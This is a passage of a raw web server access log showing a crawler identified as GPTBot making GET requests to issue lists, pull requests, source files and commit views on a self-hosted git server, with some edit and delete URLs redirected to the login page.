"https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:55:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:55:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:55:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:55:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:18:55:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:18:55:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt?display=source" [Client 74.7.227.38] [Length 12731] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" -[17/Feb/2026:18:55:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt?display=rendered" [Client 74.7.227.38] [Length 11177] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" -[17/Feb/2026:18:55:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" -[17/Feb/2026:18:55:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" -[17/Feb/2026:18:55:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" -[17/Feb/2026:18:55:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" -[17/Feb/2026:18:55:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" [Client 74.7.227.38] [Length 1051] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" -[17/Feb/2026:18:55:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" [Client 74.7.227.38] [Length 2731] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" -[17/Feb/2026:18:55:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" [Client 74.7.227.38] [Length 9857] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" -[17/Feb/2026:18:55:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" [Client 74.7.227.38] [Length 12224] [Gzip 4.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" -[17/Feb/2026:18:55:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" -[17/Feb/2026:18:55:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=closed&type=all" -[17/Feb/2026:18:55:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=open&type=all" -[17/Feb/2026:18:55:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&state=all&type=all" [Client 74.7.227.38] [Length 10128] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&state=all&type=all" -[17/Feb/2026:18:55:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:55:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastupdate&state=open&type=all" -[17/Feb/2026:18:55:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=nearduedate&state=open&type=all" -[17/Feb/2026:18:55:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16419] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/Makefile" -[17/Feb/2026:18:55:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11214] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/Makefile" -[17/Feb/2026:18:55:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=oldest&state=open&type=all" -[17/Feb/2026:18:55:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" -[17/Feb/2026:18:55:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" -[17/Feb/2026:18:55:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" -[17/Feb/2026:18:55:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" -[17/Feb/2026:18:55:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2f3.31.10" [Client 74.7.227.38] [Length 24515] [Gzip 4.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:18:55:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2findustrial-comm%2fcpp%2fsrc%2fmodbus_tcp.cpp" [Client 74.7.227.38] [Length 27554] [Gzip 7.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/modbus_tcp.cpp" -[17/Feb/2026:18:55:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2flibcomm_core.so" [Client 74.7.227.38] [Length 24158] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:18:55:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2fapp_init.hpp" [Client 74.7.227.38] [Length 23086] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:18:55:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2f3.31.10" [Client 74.7.227.38] [Length 61183] [Gzip 12.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:18:55:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2f.cmake%2fapi%2fv1%2freply" [Client 74.7.227.38] [Length 61730] [Gzip 14.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:55:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2f.cmake%2fapi%2fv1%2fquery" [Client 74.7.227.38] [Length 24924] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query" -[17/Feb/2026:18:55:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2flibcomm_core.so" [Client 74.7.227.38] [Length 22156] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:18:55:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 30062] [Gzip 7.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:18:55:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11325] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:18:55:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:18:55:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9829] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/Makefile" -[17/Feb/2026:18:55:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:55:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:55:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md?display=rendered" [Client 74.7.227.38] [Length 13159] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" -[17/Feb/2026:18:55:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11417] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:55:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:55:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:55:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:55:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:55:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:55:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:55:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:55:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=latest&state=closed&type=all" -[17/Feb/2026:18:55:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=latest&state=closed&type=all" -[17/Feb/2026:18:55:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10164] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&sort=latest&state=all&type=all" -[17/Feb/2026:18:55:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9977] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&sort=latest&state=all&type=all" -[17/Feb/2026:18:55:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=latest&state=open&type=all" [Client 